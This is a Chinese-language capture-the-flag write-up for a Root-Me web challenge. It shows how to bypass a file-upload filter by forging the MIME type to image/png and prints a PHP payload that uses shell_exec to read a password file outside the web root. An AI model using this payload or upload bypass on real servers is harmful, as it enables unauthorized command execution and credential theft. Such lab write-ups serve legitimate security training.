- 来源:Root-Me
- 题型:Web-Server
- 题目:File upload - MIME type
- 分数:20 Points
这题和【Web-Server : File upload - double extensions】的渗透思路是一样的,区别在于绕过方式。
上传一个文件测试一下,发现这次无法再利用双重后缀绕过了,只能上传图片后缀的文件。
题目提示是使用 MIME type 实现绕过。
那么构造 payloads 文件内容都是一样的,不过因为不能利用后缀绕过,所以文件名保持为 exp.php
即可:
<?php
// exp.php
// 假如这个文件上传成功,则可以利用 web 打开这个文件进行解析时进行路径穿越
$content = shell_exec('cat ../../../.passwd');
echo "<pre>$content</pre>";
?>
使用 Burp Suite -> Repeater 进行上传,同时要修改 Content-Type
的值为 image/png
即可实现绕过(原值为 application/octet-stream
)。
上传成功后刷新 upload 分类页面,找到 exp.php
打开即可获得密码,完成挑战。
答案下载
flag 下载后的 flagzip 的文件需要手动更改后缀为
*.zip
,然后解压即可(为了避免直接刷答案)